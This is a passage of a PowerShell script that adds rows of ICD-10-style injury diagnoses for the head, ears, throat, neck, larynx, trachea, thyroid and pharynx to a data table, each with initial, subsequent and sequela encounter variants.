$DiagnosisList.Rows.Add("Crushing injury of other parts of head","Crushing injury of other parts of head, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of head, part unspecified","Crushing injury of head, part unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of head, part unspecified","Crushing injury of head, part unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of head, part unspecified","Crushing injury of head, part unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Avulsion of scalp","Avulsion of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of scalp","Avulsion of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Avulsion of scalp","Avulsion of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right ear","Complete traumatic amputation of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right ear","Complete traumatic amputation of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right ear","Complete traumatic amputation of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left ear","Complete traumatic amputation of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left ear","Complete traumatic amputation of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left ear","Complete traumatic amputation of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified ear","Complete traumatic amputation of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified ear","Complete traumatic amputation of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified ear","Complete traumatic amputation of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right ear","Partial traumatic amputation of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right ear","Partial traumatic amputation of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right ear","Partial traumatic amputation of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left ear","Partial traumatic amputation of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left ear","Partial traumatic amputation of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left ear","Partial traumatic amputation of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified ear","Partial traumatic amputation of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified ear","Partial traumatic amputation of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified ear","Partial traumatic amputation of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of nose","Complete traumatic amputation of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of nose","Complete traumatic amputation of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of nose","Complete traumatic amputation of nose, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of nose","Partial traumatic amputation of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of nose","Partial traumatic amputation of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of nose","Partial traumatic amputation of nose, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic amputation of other parts of head","Traumatic amputation of other parts of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic amputation of other parts of head","Traumatic amputation of other parts of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic amputation of other parts of head","Traumatic amputation of other parts of head, sequela") + $null = $DiagnosisList.Rows.Add("Injury of blood vessels of head, not elsewhere classified","Injury of blood vessels of head, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of blood vessels of head, not elsewhere classified","Injury of blood vessels of head, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of blood vessels of head, not elsewhere classified","Injury of blood vessels of head, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of head","Unspecified injury of muscle and tendon of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of head","Unspecified injury of muscle and tendon of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle and tendon of head","Unspecified injury of muscle and tendon of head, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of head","Strain of muscle and tendon of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of head","Strain of muscle and tendon of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle and tendon of head","Strain of muscle and tendon of head, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of head","Laceration of muscle and tendon of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of head","Laceration of muscle and tendon of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle and tendon of head","Laceration of muscle and tendon of head, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of head","Other specified injury of muscle and tendon of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of head","Other specified injury of muscle and tendon of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle and tendon of head","Other specified injury of muscle and tendon of head, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ear drum","Traumatic rupture of unspecified ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ear drum","Traumatic rupture of unspecified ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ear drum","Traumatic rupture of unspecified ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ear drum","Traumatic rupture of right ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ear drum","Traumatic rupture of right ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ear drum","Traumatic rupture of right ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ear drum","Traumatic rupture of left ear drum, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ear drum","Traumatic rupture of left ear drum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ear drum","Traumatic rupture of left ear drum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right middle and inner ear","Unspecified injury of right middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right middle and inner ear","Unspecified injury of right middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right middle and inner ear","Unspecified injury of right middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left middle and inner ear","Unspecified injury of left middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left middle and inner ear","Unspecified injury of left middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left middle and inner ear","Unspecified injury of left middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified middle and inner ear","Unspecified injury of unspecified middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified middle and inner ear","Unspecified injury of unspecified middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified middle and inner ear","Unspecified injury of unspecified middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of right ear","Primary blast injury of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of right ear","Primary blast injury of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of right ear","Primary blast injury of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of left ear","Primary blast injury of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of left ear","Primary blast injury of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of left ear","Primary blast injury of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ear, bilateral","Primary blast injury of ear, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ear, bilateral","Primary blast injury of ear, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of ear, bilateral","Primary blast injury of ear, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified ear","Primary blast injury of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified ear","Primary blast injury of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of unspecified ear","Primary blast injury of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right middle and inner ear","Other specified injury of right middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right middle and inner ear","Other specified injury of right middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right middle and inner ear","Other specified injury of right middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left middle and inner ear","Other specified injury of left middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left middle and inner ear","Other specified injury of left middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left middle and inner ear","Other specified injury of left middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified middle and inner ear","Other specified injury of unspecified middle and inner ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified middle and inner ear","Other specified injury of unspecified middle and inner ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified middle and inner ear","Other specified injury of unspecified middle and inner ear, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of head","Other specified injuries of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of head","Other specified injuries of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of head","Other specified injuries of head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head","Unspecified injury of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head","Unspecified injury of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of head","Unspecified injury of head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ear","Unspecified injury of ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ear","Unspecified injury of ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ear","Unspecified injury of ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of nose","Unspecified injury of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of nose","Unspecified injury of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of nose","Unspecified injury of nose, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of face","Unspecified injury of face, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of face","Unspecified injury of face, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of face","Unspecified injury of face, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of throat","Contusion of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of throat","Contusion of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of throat","Contusion of throat, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of throat","Unspecified superficial injuries of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of throat","Unspecified superficial injuries of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injuries of throat","Unspecified superficial injuries of throat, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of throat","Abrasion of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of throat","Abrasion of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of throat","Abrasion of throat, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of throat","Blister (nonthermal) of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of throat","Blister (nonthermal) of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of throat","Blister (nonthermal) of throat, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of part of throat","External constriction of part of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of throat","External constriction of part of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of part of throat","External constriction of part of throat, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of throat","Superficial foreign body of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of throat","Superficial foreign body of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of throat","Superficial foreign body of throat, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of throat","Insect bite (nonvenomous) of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of throat","Insect bite (nonvenomous) of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of throat","Insect bite (nonvenomous) of throat, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of throat","Other superficial bite of throat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of throat","Other superficial bite of throat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of throat","Other superficial bite of throat, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other specified part of neck","Unspecified superficial injury of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other specified part of neck","Unspecified superficial injury of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other specified part of neck","Unspecified superficial injury of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of other specified part of neck","Abrasion of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other specified part of neck","Abrasion of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other specified part of neck","Abrasion of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other specified part of neck","Blister (nonthermal) of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other specified part of neck","Blister (nonthermal) of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other specified part of neck","Blister (nonthermal) of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other specified part of neck","Contusion of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other specified part of neck","Contusion of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other specified part of neck","Contusion of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of other specified part of neck","External constriction of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other specified part of neck","External constriction of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other specified part of neck","External constriction of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other specified part of neck","Superficial foreign body of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other specified part of neck","Superficial foreign body of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other specified part of neck","Superficial foreign body of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite of other specified part of neck","Insect bite of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite of other specified part of neck","Insect bite of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite of other specified part of neck","Insect bite of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other specified part of neck","Other superficial bite of other specified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other specified part of neck","Other superficial bite of other specified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other specified part of neck","Other superficial bite of other specified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of neck","Unspecified superficial injury of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of neck","Unspecified superficial injury of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of neck","Unspecified superficial injury of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of neck","Abrasion of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of neck","Abrasion of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of neck","Abrasion of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of neck","Blister (nonthermal) of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of neck","Blister (nonthermal) of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of neck","Blister (nonthermal) of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of neck","Contusion of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of neck","Contusion of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of neck","Contusion of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of neck","External constriction of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of neck","External constriction of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of neck","External constriction of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of neck","Superficial foreign body of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of neck","Superficial foreign body of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of neck","Superficial foreign body of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite of unspecified part of neck","Insect bite of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite of unspecified part of neck","Insect bite of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite of unspecified part of neck","Insect bite of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of neck","Other superficial bite of unspecified part of neck, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of neck","Other superficial bite of unspecified part of neck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of neck","Other superficial bite of unspecified part of neck, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of larynx","Laceration without foreign body of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of larynx","Laceration without foreign body of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of larynx","Laceration without foreign body of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of larynx","Laceration with foreign body of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of larynx","Laceration with foreign body of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of larynx","Laceration with foreign body of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of larynx","Puncture wound without foreign body of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of larynx","Puncture wound without foreign body of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of larynx","Puncture wound without foreign body of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of larynx","Puncture wound with foreign body of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of larynx","Puncture wound with foreign body of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of larynx","Puncture wound with foreign body of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of larynx","Open bite of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of larynx","Open bite of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of larynx","Open bite of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of larynx","Unspecified open wound of larynx, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of larynx","Unspecified open wound of larynx, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of larynx","Unspecified open wound of larynx, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of trachea","Laceration without foreign body of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of trachea","Laceration without foreign body of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of trachea","Laceration without foreign body of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of trachea","Laceration with foreign body of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of trachea","Laceration with foreign body of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of trachea","Laceration with foreign body of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of trachea","Puncture wound without foreign body of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of trachea","Puncture wound without foreign body of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of trachea","Puncture wound without foreign body of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of trachea","Puncture wound with foreign body of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of trachea","Puncture wound with foreign body of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of trachea","Puncture wound with foreign body of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of trachea","Open bite of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of trachea","Open bite of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of trachea","Open bite of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of trachea","Unspecified open wound of trachea, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of trachea","Unspecified open wound of trachea, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of trachea","Unspecified open wound of trachea, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vocal cord","Laceration without foreign body of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vocal cord","Laceration without foreign body of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of vocal cord","Laceration without foreign body of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vocal cord","Laceration with foreign body of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vocal cord","Laceration with foreign body of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of vocal cord","Laceration with foreign body of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vocal cord","Puncture wound without foreign body of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vocal cord","Puncture wound without foreign body of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of vocal cord","Puncture wound without foreign body of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vocal cord","Puncture wound with foreign body of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vocal cord","Puncture wound with foreign body of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of vocal cord","Puncture wound with foreign body of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of vocal cord","Open bite of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of vocal cord","Open bite of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of vocal cord","Open bite of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vocal cord","Unspecified open wound of vocal cord, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vocal cord","Unspecified open wound of vocal cord, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of vocal cord","Unspecified open wound of vocal cord, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of thyroid gland","Unspecified open wound of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of thyroid gland","Unspecified open wound of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of thyroid gland","Unspecified open wound of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of thyroid gland","Laceration without foreign body of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of thyroid gland","Laceration without foreign body of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of thyroid gland","Laceration without foreign body of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of thyroid gland","Laceration with foreign body of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of thyroid gland","Laceration with foreign body of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of thyroid gland","Laceration with foreign body of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of thyroid gland","Puncture wound without foreign body of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of thyroid gland","Puncture wound without foreign body of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of thyroid gland","Puncture wound without foreign body of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of thyroid gland","Puncture wound with foreign body of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of thyroid gland","Puncture wound with foreign body of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of thyroid gland","Puncture wound with foreign body of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of thyroid gland","Open bite of thyroid gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of thyroid gland","Open bite of thyroid gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of thyroid gland","Open bite of thyroid gland, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of pharynx and cervical esophagus","Unspecified open wound of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of pharynx and cervical esophagus","Unspecified open wound of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of pharynx and cervical esophagus","Unspecified open wound of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of pharynx and cervical esophagus","Laceration without foreign body of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of pharynx and cervical esophagus","Laceration without foreign body of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of pharynx and cervical esophagus","Laceration without foreign body of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of pharynx and cervical esophagus","Laceration with foreign body of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of pharynx and cervical esophagus","Laceration with foreign body of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of pharynx and cervical esophagus","Laceration with foreign body of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of pharynx and cervical esophagus","Puncture wound without foreign body of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of pharynx and cervical esophagus","Puncture wound without foreign body of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of pharynx and cervical esophagus","Puncture wound without foreign body of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of pharynx and cervical esophagus","Puncture wound with foreign body of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of pharynx and cervical esophagus","Puncture wound with foreign body of pharynx and cervical esophagus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of pharynx and cervical esophagus","Puncture wound with foreign body of pharynx and cervical esophagus, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of pharynx and cervical esophagus","Open bite of pharynx and cervical esophagus, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of pharynx and cervical esophagus","Open bite of pharynx and cervical esophagus, subsequent encounter") + $null = 